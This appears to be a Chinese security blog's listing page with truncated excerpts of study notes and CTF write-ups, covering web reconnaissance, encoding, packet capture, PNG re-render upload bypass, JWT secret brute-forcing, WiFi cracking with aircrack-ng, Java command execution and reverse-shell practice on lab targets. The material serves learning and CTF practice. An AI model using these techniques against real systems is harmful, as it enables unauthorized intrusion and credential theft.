第6天:信息打点-Web架构篇_域名_语言_中间件_数据库_系统_源码获取#知识点:1、打点-Web架构-语言&中间件&数据库&系统等
2、打点-Web源码-CMS开源&闭源售卖&自主研发等
开源:可以上网搜索,免费使用,使用人不太重视
闭源:在内部,或者需要购买(源代码可能加密等)
自主研发:这套源码只是自己研发,只有自己用,不想让别人知道。(大型网站)
3、打点-Web源码获取-泄露安全&资源监控&其他等
4、打点-Web域名-子域名&相似域名&反查域名&旁注等
#信息点:基础信息,系统信息,应用信息,防护信息,人员信息,其他信息(子公司等)等
#技术点:CMS识别,端口扫描,CDN绕过,源码获取,子域名查询,WAF识别,负载均衡识别等
不同操作系统,他的TTL值不相同,默认情况下:
Linux系统的TTL值为64或225
windows NT/2000/xp 系统的TTL值为128
windows 98系统的TTL值为32
UNIX主机的TTL值为225
数据库的常见端口主要包括 ...
第5天:资产架构_端口_应用_CDN_WAF_站库分离_负载均衡知识点:\1. 资产架构-端口&目录&插件接口&多站点&多应用
\2. 番外安全-域名&服务器本身&服务厂商&管理人员
\3. 考虑阻碍-站库分离&CDN&WAF&负载均衡&主机防护
详细点:1、前置条件-购买使用-云服务器&域名等
2、架构搭建-目录&端口&子域&插件&应用等
3、安全部署-WAF防火墙&主机防护&HIDS等
4、性能优化-负载均衡&CDN加速&OSS云存储等
资产架构-BT搭建&多站点&多插件&多应用等1.WEB单个源码指向安全
单个源码只需要绑定相对应的网站域名
2.WEB多个目录源码安全
bbs.xiaodi8.com dz论坛
bbs.xiaodi8.com/blog wp程序
一个网站,两个程序,任何一个程序出现问题都可以进行测试,选择不同目录。
3.WEB多个端口源码安全
bbs. ...
第4天:30余种加密编码进制_Web_数据库_系统_代码_参数值意义了解加密编码进制在安全测试中的作用
掌握常见的加密解密编码解码进制互转的影响
知识点:存储密码加密-Web&数据库&系统
传输数据编码-各类组合传输参数值
代码特性加密-JS&PHP&NET&JAVA
数据显示编码-字符串数据显示编码
详细点密码存储加密:
MD5 SHA1 NTLM AES DES RC4
MD5值是32或16位由数字0-9和字母a-f组成的字符串,字母大小写不影响
(散列函数,单向性,破解方法:从算法入手,逆向;枚举、碰撞)
SHA1密文特征和MD5差不多,位数40
NTLM是Windows的哈希密码,标准通讯安全协议
AES、DES、RC4是对称性加密算法,引入密钥,密文特征与Base64相似
受到加密模式、填充、数据块、密码、偏移量、输出(base64)、字符集的各种因素的影响
应用场景:各类应用密文,自定义算法,代码分析,CTF比赛等
md5加密,不可以通过算法解密
尝试生成很多的加密或对应明文的字符去枚举
查询时先填写md5值,然后冒号(搜索 ...
第3天:抓包_封包_协议_APP_小程序_PC应用_WEB应用抓包技术应用意义
抓包技术应用对象
抓包技术应用协议
抓包技术应用支持
封包技术应用意义
总结:学会不同对象采用不同抓包封包抓取技术分析
抓包工具fiddler charles tcpdump bp wireshark 科来网络分析系统 WPE
利用网站的功能抓:按F12之后点击”网络“选项卡
App&小程序&PC抓包HTTP/S数据-Charles&Fiddler&Burpsuite:Charles证书安装:https://blog.csdn.net/m0_56758840/article/details/133954138
要安装证书,不然用不了
Fiddler雷电模拟器安装Fiddler证书:
https://zhuanlan.zhihu.com/p/568584404/
安装好之后,设置好代理之后就可以抓包了
可以小程序抓包,抓电脑上的软件的包
wiresharkwireshark抓包:
之前的wireshark没法用,可能是因为没有安装Npcap的原因,然后从官网上 ...
WEB[Week3] 拜师之旅·番外上传一个png图片之后会提示你下载或访问,我们把下载下来的图片和上传的图片放在010里对比一下
然后可以看到图片的内容被改了,所以这题考点是png图片二次渲染
贴一下官方wp里的php代码:
1234567891011121314151617181920212223242526<?php$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23, 0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae, 0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc, 0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f, 0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c, 0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6 ...
SHCTF-week2-复现[Week2]登录验证点进去给了个登录页面,试试admin,admin显示“你不是真正的admin”
抓包看到cookie的token:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3Mjk1MjA3ODYsImlhdCI6MTcyOTUxMzU4NiwibmJmIjoxNzI5NTEzNTg2LCJyb2xlIjoidXNlciJ9.ZIBYI_XGX6BnHSgCByVoAaDKfP8EqDfpXtWxQDo9aq8
放jwt解密网站上
解密网站:https://jwt.io/
这边可以看到用户为user,但是这里直接改成admin的是不行的,从题目的描述可以知道这里修改的话需要密钥,题目说“666666”,猜测是个6位密码,这里需要用到jwt-cracker这个工具爆破一下
jwt-cracker:https://github.com/lmammino/jwt-cracker
爆破出来密钥是222333,放回到jwt那个网站,然后修改用户为admin,复制所得的token,放到bp里发包就能看到 ...
[Week 1] 肘,上链!环境配置MetaMask浏览器插件商店搜索并添加即可,然后创建一个账户(建议使用chrome)
RemixSolidity语言的一个在线ide网站-Remix:https://remix.ethereum.org/
python的web3库安装命令:pip install web3
开始复现先nc连上去创建个账户
第一句话告诉我们,我们的任务是要让isSolved函数的返回值为ture
再nc连接一遍,这次输入2,填入之前给的token获取合约地址(contract address)
然后打开MetaMask添加到测试网络,并切换到此网络
先到题目所给水龙头地址接点水,因为部署合约需要支付一定的费用
将自己钱包地址粘贴到框框中,点击Request,稍等一会,测试币就到账了
然后获取此题目的合约代码
合约代码如下:
12345678910111213141516171819// SPDX-License-Identifier: UNLICENSEDpragma solidity ^0.8.0;contract Signin { byte ...
MISC[Week1-Week4] 签到题签到就不用说了
拜师之旅①题目给了一张打开了显示不了的图片,放010发现没有文件头,手动修改一下
然后发现还没显示出flag,puzzle爆破一下宽高试试
真真假假?遮遮掩掩!压缩包是伪加密,使用随波逐流的工具修复一下
然后解压出压缩包,发现里面有flag.txt,但是被加密了,掩码爆破秒了
爆破出来的密码为
[Week1]有WiFi干嘛不用呢?题目附件给的文件中,may文件夹下的都是密码字典,收集一下,搞到一个文本里,然后这题需要用到kali虚拟机里面的aircrack-ng这个工具
命令就是:aircrack-ng [题目给的cap文件] -w [字典]
结果如下:
知道密码了也就知道得到flag了
WEB[Week1] jvav
给了个输入框,说尝试创建你的第一个demo.java,然后执行这个代码,尝试把 cat /flag 写成java代码,让gpt写一个就完了
12345678910111213141516171819202122232425import java.io.BufferedReader;impo ...
棱角社区网站:
https://forum.ywhack.com/coding.php
防火墙入站检测严格,出站检测宽松
windows:df防火墙
linux:iptables
常用命令windows:https://blog.csdn.net/qq_39939541/article/details/131749915
linux:https://blog.csdn.net/wzk4869/article/details/132855372
文件上传下载可以看棱角社区的网站:
例如:
反弹shell正向:用服务器监听攻击机连接
反向:攻击机监听服务器连接
pikachu靶场搭建https://blog.csdn.net/m0_73912575/article/details/135574328
看这一篇就够了,这篇讲的是用小皮搭的靶场
复现然后这个靶场反弹shell没弹成功,让zyf开了个ctfshow web29的靶场,然后反弹shell,连上了,但是可能CTFos这个虚拟机反应有点慢,所以没反应
payload:
https://5909aed2-8a0a-4583-84e ...
网站搭建前置知识域名:https://wenku.baidu.com/view/d1b803607e21af45b207a802.html?fr=aladdin664466&ind=1&aigcsid=0&qtype=0&lcid=1&queryKey=%E5%9F%9F%E5%90%8D%E6%98%AF%E4%BB%80%E4%B9%88&wkts=1716456028076&bdQuery=%E5%9F%9F%E5%90%8D%E6%98%AF%E4%BB%80%E4%B9%88
子域名:https://blog.csdn.net/zacji/article/details/117521408
DNS:https://blog.csdn.net/m0_46228204/article/details/129862842
HTTP/HTTPS,证书:https://baike.baidu.com/item/HTTP/243074?fr=ge_ala
https://baike.baidu.com/item/HTTPS/285356?fr=ge_ ...